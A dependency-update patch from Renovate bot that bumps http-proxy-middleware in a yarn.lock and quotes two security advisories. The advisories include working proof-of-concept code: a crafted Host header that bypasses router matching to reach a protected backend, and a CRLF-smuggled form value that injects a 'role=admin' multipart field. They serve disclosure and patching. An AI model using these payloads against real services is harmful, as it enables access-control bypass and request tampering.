From 16196c6ca10daf4703ab39083026361252503d7f Mon Sep 17 00:00:00 2001
From: "renovate[bot]" <29139614+renovate[bot]@users.noreply.github.com>
Date: Fri, 19 Jun 2026 12:18:31 +0800
Subject: [PATCH] chore: bump up http-proxy-middleware version to v3.0.7
[SECURITY] (#15131)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[http-proxy-middleware](https://redirect.github.com/chimurai/http-proxy-middleware)
| [`3.0.5` →
`3.0.7`](https://renovatebot.com/diffs/npm/http-proxy-middleware/3.0.5/3.0.7)
|

|

|
---
### http-proxy-middleware `router` host+path substring matching allows
Host-header-driven backend routing bypass
[CVE-2026-55602](https://nvd.nist.gov/vuln/detail/CVE-2026-55602) /
[GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)
More information
#### Details
##### Summary
`http-proxy-middleware` documents `router` proxy-table entries as host,
path, or host+path selectors, but the host+path implementation uses
unanchored substring matching on attacker-controlled request metadata.
As a result, a crafted `Host` header that is only a superstring match
for a configured host+path key can still route a request to an
unintended backend.
##### Details
Tested code state:
- validated on tag `v4.0.0-beta.5`
- corresponding commit: `339f09ede860197807d4fd99ed9020fa5d0bd358`
Relevant code locations:
- `src/router.ts`
- `src/http-proxy-middleware.ts`
Affected public API:
- `createProxyMiddleware({ router: { 'host/path': 'http://target' } })`
Code explanation:
When a proxy-table router key contains `/`, `getTargetFromProxyTable()`
concatenates attacker-controlled `req.headers.host` and `req.url` into a
single `hostAndPath` string, then accepts the route if:
```ts
hostAndPath.indexOf(key) > -1
```
That is a substring test, not an exact host match plus intended path
match. In the validated PoC, the configured router key is:
```txt
localhost:3000/api
```
but the attacker-controlled host is:
```txt
evillocalhost:3000
```
and the request path is:
```txt
/api
```
The concatenated attacker-controlled string:
```txt
evillocalhost:3000/api
```
still contains the configured router key as a substring, so the
middleware selects the alternate backend even though the host is not
equal to the configured host.
Exploit path:
1. the application enables the documented proxy-table `router` feature
with at least one host+path rule
2. an external attacker sends an ordinary HTTP request with a crafted
`Host` header
3. `HttpProxyMiddleware.prepareProxyRequest()` applies router selection
before proxying
4. `getTargetFromProxyTable()` accepts the crafted `Host + path` string
through substring matching
5. the request is proxied to the wrong backend
##### PoC
Create these files in the same working directory and run:
```bash
bash ./run.sh
```
##### File: `run.sh`
```bash
#!/usr/bin/env bash
set -euo pipefail
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
REPO_URL="https://github.com/chimurai/http-proxy-middleware.git"
REPO_REF="v4.0.0-beta.5"
WORKDIR="$(mktemp -d "${SCRIPT_DIR}/.tmp-repro.XXXXXX")"
TARGET_REPO_DIR="${WORKDIR}/repo"
REPRO_DIR="${WORKDIR}/reproduction"
IMAGE_TAG="http-proxy-middleware-router-bypass-poc"
cleanup() {
rm -rf "${WORKDIR}"
}
trap cleanup EXIT
echo "[a3] cloning target repository"
git clone --quiet "${REPO_URL}" "${TARGET_REPO_DIR}"
git -C "${TARGET_REPO_DIR}" checkout --quiet "${REPO_REF}"
mkdir -p "${REPRO_DIR}"
cp "${SCRIPT_DIR}/Dockerfile" "${WORKDIR}/Dockerfile"
cp "${SCRIPT_DIR}/verify.mjs" "${REPRO_DIR}/verify.mjs"
echo "[a3] building reproduction image"
docker build -f "${WORKDIR}/Dockerfile" -t "${IMAGE_TAG}" "${WORKDIR}"
echo "[a3] running verification"
docker run --rm "${IMAGE_TAG}" node /work/reproduction/verify.mjs
```
##### File: `Dockerfile`
```Dockerfile
FROM node:22-bullseye
WORKDIR /work
COPY repo/package.json repo/yarn.lock /work/repo/
RUN corepack enable \
&& cd /work/repo \
&& yarn install --frozen-lockfile
COPY repo /work/repo
RUN cd /work/repo && yarn build
COPY reproduction /work/reproduction
```
##### File: `verify.mjs`
```js
import http from 'node:http';
import fs from 'node:fs';
import assert from 'node:assert/strict';
import { createProxyMiddleware } from '/work/repo/dist/index.js';
const ROUTER_KEY = 'localhost:3000/api';
const CRAFTED_HOST = 'evillocalhost:3000';
function listen(server, port) {
return new Promise((resolve) => {
server.listen(port, '127.0.0.1', () => resolve());
});
}
function close(server) {
return new Promise((resolve, reject) => {
server.close((err) => {
if (err) {
reject(err);
return;
}
resolve();
});
});
}
function request(path, host) {
return new Promise((resolve, reject) => {
const req = http.request(
{
host: '127.0.0.1',
port: 3000,
path,
method: 'GET',
headers: {
Host: host,
},
},
(res) => {
let data = '';
res.setEncoding('utf8');
res.on('data', (chunk) => {
data += chunk;
});
res.on('end', () => {
resolve({ statusCode: res.statusCode, body: data });
});
},
);
req.on('error', reject);
req.end();
});
}
const defaultBackend = http.createServer((req, res) => {
res.end('DEFAULT');
});
const secretBackend = http.createServer((req, res) => {
res.end('SECRET');
});
const proxyMiddleware = createProxyMiddleware({
target: 'http://127.0.0.1:3101',
router: {
[ROUTER_KEY]: 'http://127.0.0.1:3102',
},
});
const proxyServer = http.createServer((req, res) => {
proxyMiddleware(req, res, () => {
res.statusCode = 404;
res.end('NO_PROXY');
});
});
try {
assert.ok(fs.existsSync('/work/repo/dist/index.js'));
assert.ok(fs.existsSync('/work/reproduction/verify.mjs'));
await listen(defaultBackend, 3101);
await listen(secretBackend, 3102);
await listen(proxyServer, 3000);
console.log('STEP start-services ok');
const baseline = await request('/api', 'safe.example:3000');
assert.equal(baseline.statusCode, 200);
assert.equal(baseline.body, 'DEFAULT');
console.log(`STEP baseline-route body=${baseline.body}`);
const crafted = await request('/api', CRAFTED_HOST);
assert.equal(crafted.statusCode, 200);
assert.equal(crafted.body, 'SECRET');
assert.notEqual(CRAFTED_HOST, ROUTER_KEY.split('/')[0]);
console.log(`STEP crafted-route body=${crafted.body}`);
console.log('RESULT reproduced host_header_injection router substring match bypass');
} finally {
await Promise.allSettled([close(proxyServer), close(defaultBackend), close(secretBackend)]);
}
```
This PoC starts:
- one default backend returning `DEFAULT`
- one alternate backend returning `SECRET`
- one proxy using:
```js
createProxyMiddleware({
target: 'http://127.0.0.1:3101',
router: {
[ROUTER_KEY]: 'http://127.0.0.1:3102',
},
});
```
It then sends:
1. a baseline request to `/api` with `Host: safe.example:3000`
2. a crafted request to `/api` with `Host: evillocalhost:3000`
Observed result from the validated PoC:
- baseline request: `STEP baseline-route body=DEFAULT`
- crafted request: `STEP crafted-route body=SECRET`
- success marker: `RESULT reproduced host_header_injection router
substring match bypass`
The PoC is considered successful only if:
1. the baseline request stays on the default backend
2. the crafted request reaches the alternate backend
3. the crafted host is not equal to the configured router host
##### Impact
This is a backend-selection integrity issue in a documented library
feature. Applications that use host+path router-table rules for backend
segmentation, tenant routing, or separation of public and more sensitive
upstreams can have that routing boundary bypassed by an unauthenticated
external client using an ordinary crafted `Host` header.
#### Severity
- CVSS Score: 6.9 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`
#### References
-
[https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-64mm-vxmg-q3vj)
-
[https://github.com/advisories/GHSA-64mm-vxmg-q3vj](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)
This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-64mm-vxmg-q3vj)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
---
### http-proxy-middleware: multipart/form-data field injection via
unescaped CRLF in `fixRequestBody`
[CVE-2026-55603](https://nvd.nist.gov/vuln/detail/CVE-2026-55603) /
[GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)
More information
#### Details
##### Summary
`fixRequestBody()` is the library's documented helper for re-emitting a
request body that was already consumed by a body parser. When the
**outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the
body with `handlerFormDataBodyData()`, which interpolates each
`req.body` key and value directly into the multipart wire format
**without neutralizing CR/LF**:
```js
// dist/handlers/fix-request-body.js
function handlerFormDataBodyData(contentType, data) {
const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
let str = '';
for (const [key, value] of Object.entries(data)) {
str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`;
}
}
```
A `\r\n` inside a value (or key) lets an attacker close the current part
and inject an **entirely new form part**. Because the proxy's own body
parser saw a single opaque value, any gateway-side policy or validation
performed on `req.body` is evaluated against a different set of fields
than the upstream backend ultimately parses a request/parameter
desynchronization across the trust boundary.
By contrast, the sibling output branches are safe: `application/json`
uses `JSON.stringify` (escapes control chars) and
`application/x-www-form-urlencoded` uses `querystring.stringify`
(percent-encodes). Only the multipart branch lacks escaping.
##### Preconditions
All three must hold; this narrows real-world exposure and is the basis
for `AC:H`:
1. The proxy app populates `req.body` with a **non-multipart** parser
(`express.urlencoded`, `express.json`, or text) so an injected boundary
in a value is **not** split on input.
2. The proxied (outgoing) request is sent as **`multipart/form-data`**
(e.g. an adaptation layer, or any flow that sets the upstream
content-type to multipart), so the vulnerable branch runs.
3. The app calls `fixRequestBody` (the documented pattern for "I
body-parsed, now re-stream"), and an attacker controls at least one body
field value or key.
> Note: a pure multipart-in → multipart-out flow (e.g. `multer`) is
generally **not** exploitable for a *new-field* injection, because the
proxy's multipart parser already splits the injected boundary, so
`req.body` and the backend agree. The desync specifically requires a
non-multipart input parser.
##### Impact
When the preconditions hold, an attacker injects/overrides multipart
fields seen only by the backend:
- **Validation / access-control bypass** bypass gateway-side field
checks (demonstrated below: a gateway that forbids `role=admin` is
bypassed; backend grants admin).
- **Parameter tampering** add or overwrite fields the backend trusts
(IDs, flags, prices).
- **File-part injection** inject a `filename="..."` part into the
upstream multipart stream.
##### Proof of Concept
```js
// npm i http-proxy-middleware@4.0.0 (Node ESM: save as minimal.mjs)
import { fixRequestBody } from 'http-proxy-middleware';
// `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it.
// The attacker sent user=alice%0D%0A--BB%0D%0A... so this ONE field's value holds CRLF:
const req = { readableLength: 0, body: {
user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--'
}};
// Minimal stand-in for the outgoing proxy request; capture what gets written.
const out = [];
const proxyReq = {
h: { 'content-type': 'multipart/form-data; boundary=BB' },
getHeader(n){ return this.h[n.toLowerCase()]; },
setHeader(n,v){ this.h[n.toLowerCase()] = v; },
write(d){ out.push(Buffer.from(d)); },
};
fixRequestBody(proxyReq, req); // library rebuilds the multipart body
console.log(Buffer.concat(out).toString());
```
Output: one input field becomes **two** parts; `role=admin` was injected
via the unescaped CRLF:
```
--BB
Content-Disposition: form-data; name="user"
alice
--BB
Content-Disposition: form-data; name="role" <-- injected part; never present in req.body's keys
admin
--BB--
```
`req.body` had a single key (`user`), so any gateway policy checking
`req.body.role` passes, yet the backend's multipart parser receives
`role=admin`. On the wire the attacker simply sends, as
`application/x-www-form-urlencoded`:
`user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--`
##### Remediation
Neutralize CR/LF (and `"`) in keys/values before interpolation, or build
the body with a real multipart encoder (e.g. `FormData` / `form-data`)
instead of string concatenation. Minimal fix:
```js
function handlerFormDataBodyData(contentType, data) {
const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
const bad = /[\r\n]/;
let str = '';
for (const [key, value] of Object.entries(data)) {
const v = String(value);
if (bad.test(key) || bad.test(v)) {
throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value');
}
str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`;
}
}
```
(Reject is preferable to silent stripping, to avoid masking malicious
input.)
#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N`
#### References
-
[https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm)
-
[https://github.com/advisories/GHSA-gcq2-9pq2-cxqm](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)
This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-gcq2-9pq2-cxqm)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
---
### Release Notes
chimurai/http-proxy-middleware
(http-proxy-middleware)
###
[`v3.0.7`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.7)
[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.6...v3.0.7)
#### What's Changed
- fix(fixRequestBody): harden form-data stringification by
[@chimurai](https://redirect.github.com/chimurai) in
[#1259](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1259)
- chore(package.json): v3.0.7 by
[@chimurai](https://redirect.github.com/chimurai) in
[#1261](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1261)
**Full Changelog**:
###
[`v3.0.6`](https://redirect.github.com/chimurai/http-proxy-middleware/releases/tag/v3.0.6)
[Compare
Source](https://redirect.github.com/chimurai/http-proxy-middleware/compare/v3.0.5...v3.0.6)
#### What's Changed
- fix(types): fix Logger type by
[@chimurai](https://redirect.github.com/chimurai) in
[#1104](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1104)
- fix(fixRequestBody): support text/plain by
[@knudtty](https://redirect.github.com/knudtty) in
[#1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- chore(examples): bump deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1105](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1105)
- build(prettier): improve prettier setup by
[@chimurai](https://redirect.github.com/chimurai) in
[#1108](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1108)
- chore(deps): fix punycode node deprecation warning by
[@chimurai](https://redirect.github.com/chimurai) in
[#1109](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1109)
- chore(examples): bump deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1110](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1110)
- build(codespaces): add devcontainer.json by
[@chimurai](https://redirect.github.com/chimurai) in
[#1112](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1112)
- chore(package): bump dev dependencies by
[@chimurai](https://redirect.github.com/chimurai) in
[#1116](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1116)
- ci(github-action): ci.yml add node v24 by
[@chimurai](https://redirect.github.com/chimurai) in
[#1117](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1117)
- chore(package): bump dev dependencies by
[@chimurai](https://redirect.github.com/chimurai) in
[#1118](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1118)
- chore(package): upgrade to jest v30 by
[@chimurai](https://redirect.github.com/chimurai) in
[#1122](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1122)
- chore(examples): upgrade deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1124](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1124)
- chore(package): update dev deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1125](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1125)
- test(websocket): fix ws import by
[@chimurai](https://redirect.github.com/chimurai) in
[#1126](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1126)
- chore(refactor): use `node:` protocol imports by
[@chimurai](https://redirect.github.com/chimurai) in
[#1127](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1127)
- ci(node24): pin node24 due to TLS issue with mockttp by
[@chimurai](https://redirect.github.com/chimurai) in
[#1137](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1137)
- docs(recipes/pathRewrite.md): fix comment by
[@DEBargha2004](https://redirect.github.com/DEBargha2004) in
[#1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- chore(package): bump dev deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1138](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1138)
- chore(deps): update actions/checkout action to v5 by
[@chimurai](https://redirect.github.com/chimurai) in
[#1140](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1140)
- fix(error-response-plugin): sanitize input by
[@chimurai](https://redirect.github.com/chimurai) in
[#1141](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1141)
- chore(package.json): update dev deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1143](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1143)
- chore: add context7.json by
[@chimurai](https://redirect.github.com/chimurai) in
[#1144](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1144)
- build(eslint): update eslint.config.mjs by
[@chimurai](https://redirect.github.com/chimurai) in
[#1145](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1145)
- ci(github workflow): harden github workflows by
[@chimurai](https://redirect.github.com/chimurai) in
[#1146](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1146)
- chore(package): bump dev deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1147](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1147)
- ci(ci.yml): unpin node 24 by
[@chimurai](https://redirect.github.com/chimurai) in
[#1148](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1148)
- docs(recipes): fix servers.md http.createServer example by
[@hacklschorsch](https://redirect.github.com/hacklschorsch) in
[#1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)
- ci: publish with oidc by
[@chimurai](https://redirect.github.com/chimurai) in
[#1152](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1152)
- chore(package.json): bump dev deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1153](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1153)
- chore(package.json): bump dev deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1155](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1155)
- chore(package.json): bump dev deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1158](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1158)
- test(types.spec.ts): add type check when req or res are 'any' by
[@chimurai](https://redirect.github.com/chimurai) in
[#1161](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1161)
- chore(package.json): bump deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1164](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1164)
- chore(package.json): eslint v10 by
[@chimurai](https://redirect.github.com/chimurai) in
[#1165](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1165)
- chore(package.json): bump dev deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1166](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1166)
- chore(package.json): bump dev-deps by
[@chimurai](https://redirect.github.com/chimurai) in
[#1171](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1171)
- docs(examples): fix websocket example by
[@chimurai](https://redirect.github.com/chimurai) in
[#1170](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1170)
- build(vscode): use workspace version of TypeScript by
[@chimurai](https://redirect.github.com/chimurai) in
[#1173](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1173)
- fix(router): harden proxy-table matching by
[@chimurai](https://redirect.github.com/chimurai) in
[#1254](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1254)
- chore(package.json): v3.0.6 by
[@chimurai](https://redirect.github.com/chimurai) in
[#1256](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1256)
#### New Contributors
- [@knudtty](https://redirect.github.com/knudtty) made their
first contribution in
[#1103](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1103)
- [@DEBargha2004](https://redirect.github.com/DEBargha2004) made
their first contribution in
[#1135](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1135)
- [@hacklschorsch](https://redirect.github.com/hacklschorsch)
made their first contribution in
[#1150](https://redirect.github.com/chimurai/http-proxy-middleware/pull/1150)
**Full Changelog**:
---
### Configuration
📅 **Schedule**: (UTC)
- Branch creation
- At any time (no schedule defined)
- Automerge
- At any time (no schedule defined)
🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
---
yarn.lock | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/yarn.lock b/yarn.lock
index 60851c8e41..36b133a616 100644
--- a/yarn.lock
+++ b/yarn.lock
@@ -25371,8 +25371,8 @@ __metadata:
linkType: hard
"http-proxy-middleware@npm:^3.0.5":
- version: 3.0.5
- resolution: "http-proxy-middleware@npm:3.0.5"
+ version: 3.0.7
+ resolution: "http-proxy-middleware@npm:3.0.7"
dependencies:
"@types/http-proxy": "npm:^1.17.15"
debug: "npm:^4.3.6"
@@ -25380,7 +25380,7 @@ __metadata:
is-glob: "npm:^4.0.3"
is-plain-object: "npm:^5.0.0"
micromatch: "npm:^4.0.8"
- checksum: 10/83c1956be6451a5f4a2f3c7b3d84085dbd47e1efb5bb684c1ed668a6606c18c7c07be823b0dbba1326955b64cf88de2672492940b0b48d140215fbdb06105c9a
+ checksum: 10/a44135de721e55517b0fca596855e1e4da92b5fdad247425b4253a345fface37b2a800fcfe37dc28863e9021d8c56cf9cb33ebd20d63c9eca6918a46b39082d4
languageName: node
linkType: hard